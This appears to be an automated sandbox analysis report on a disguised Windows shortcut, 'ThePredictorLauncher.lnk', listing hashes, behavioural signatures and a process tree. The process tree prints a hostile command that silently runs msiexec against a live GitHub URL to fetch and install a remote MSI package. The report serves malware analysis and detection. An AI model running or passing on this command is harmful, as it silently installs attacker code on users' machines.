Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20/02/2025, 14:14
Static task
static1
Behavioral task
behavioral1
Sample
ThePredictorLauncher.lnk
Resource
win7-20240903-en
6 signatures
150 seconds
Behavioral task
behavioral2
Sample
ThePredictorLauncher.lnk
Resource
win10v2004-20250217-en
21 signatures
150 seconds
General
-
Target
ThePredictorLauncher.lnk
-
Size
1KB
-
MD5
8dbf4ab21c88acc16ba80e2e7e38b7a1
-
SHA1
d7799dcface5716afa2897e0ab29bd3dc1293f7c
-
SHA256
5c2213dfe07175eabf7ae8950609569f93bae26019a7c84741b611a96784e1a8
-
SHA512
01244a05f3d0c230a1b210168f31e8bbb504dbf064c1c9a4ac8095007469b04f78a343cd5d1f2106e849c82d27a2bf66c28e0cfc5b7364c227950459cb864fed
Score
7/10
Malware Config
Signatures
-
Use of msiexec (install) with remote resource 1 IoCs
pid Process 2820 msiexec.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2920 msiexec.exe 6 2920 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2820 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeShutdownPrivilege 2820 msiexec.exe Token: SeIncreaseQuotaPrivilege 2820 msiexec.exe Token: SeRestorePrivilege 2920 msiexec.exe Token: SeTakeOwnershipPrivilege 2920 msiexec.exe Token: SeSecurityPrivilege 2920 msiexec.exe Token: SeCreateTokenPrivilege 2820 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2820 msiexec.exe Token: SeLockMemoryPrivilege 2820 msiexec.exe Token: SeIncreaseQuotaPrivilege 2820 msiexec.exe Token: SeMachineAccountPrivilege 2820 msiexec.exe Token: SeTcbPrivilege 2820 msiexec.exe Token: SeSecurityPrivilege 2820 msiexec.exe Token: SeTakeOwnershipPrivilege 2820 msiexec.exe Token: SeLoadDriverPrivilege 2820 msiexec.exe Token: SeSystemProfilePrivilege 2820 msiexec.exe Token: SeSystemtimePrivilege 2820 msiexec.exe Token: SeProfSingleProcessPrivilege 2820 msiexec.exe Token: SeIncBasePriorityPrivilege 2820 msiexec.exe Token: SeCreatePagefilePrivilege 2820 msiexec.exe Token: SeCreatePermanentPrivilege 2820 msiexec.exe Token: SeBackupPrivilege 2820 msiexec.exe Token: SeRestorePrivilege 2820 msiexec.exe Token: SeShutdownPrivilege 2820 msiexec.exe Token: SeDebugPrivilege 2820 msiexec.exe Token: SeAuditPrivilege 2820 msiexec.exe Token: SeSystemEnvironmentPrivilege 2820 msiexec.exe Token: SeChangeNotifyPrivilege 2820 msiexec.exe Token: SeRemoteShutdownPrivilege 2820 msiexec.exe Token: SeUndockPrivilege 2820 msiexec.exe Token: SeSyncAgentPrivilege 2820 msiexec.exe Token: SeEnableDelegationPrivilege 2820 msiexec.exe Token: SeManageVolumePrivilege 2820 msiexec.exe Token: SeImpersonatePrivilege 2820 msiexec.exe Token: SeCreateGlobalPrivilege 2820 msiexec.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 2468 wrote to memory of 2820 2468 cmd.exe 31 PID 2468 wrote to memory of 2820 2468 cmd.exe 31 PID 2468 wrote to memory of 2820 2468 cmd.exe 31 PID 2468 wrote to memory of 2820 2468 cmd.exe 31 PID 2468 wrote to memory of 2820 2468 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ThePredictorLauncher.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i https://github.com/leinchchanceleinch/jik/raw/refs/heads/main/d.msi /qn2⤵
- Use of msiexec (install) with remote resource
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2920